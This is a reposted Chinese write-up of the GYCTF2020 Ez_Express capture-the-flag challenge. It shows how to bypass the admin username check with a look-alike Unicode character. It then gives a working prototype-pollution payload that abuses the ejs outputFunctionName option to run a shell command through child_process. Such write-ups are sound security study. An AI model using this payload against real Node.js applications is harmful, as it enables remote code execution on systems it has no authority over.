标签：info __ 9f% e5% Express GYCTF2020 93% 原型 Ez

[GYCTF2020]Ez_Express

知识点：

javascript大小写特性

js原型链污染

解题：

打开界面一个登录框，需要以ADMIN登录，www.zip下载源码：

不允许以 admin ADMIN 注册，但是后面存在

直接使用 admın 特殊字符注册即可，

又因为存在 merge 操作，所以存在原型链污染，审计的时候发现在 / 路由时，存在

一个未定义的属性，然后再最后在 info 路由进行了渲染，寻找原型链

https://evi0s.com/2019/08/30/expresslodashejs-%e4%bb%8e%e5%8e%9f%e5%9e%8b%e9%93%be%e6%b1%a1%e6%9f%93%e5%88%b0rce/

所以我们只需要在 / 进行污染，然后在访问 info 路径即可得到回显

payload：

{"lua":"a","__proto__":{"outputFunctionName":"a=1;return global.process.mainModule.constructor._load('child_process').execSync('cat /flag')//"},"Submit":""}

记得修改 content-Type ，最后访问 info 即可下载一个 flag 文件了

标签：info,__,9f%,e5%,Express,GYCTF2020,93%,原型,Ez
来源： https://blog.csdn.net/woshilnp/article/details/120263373

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。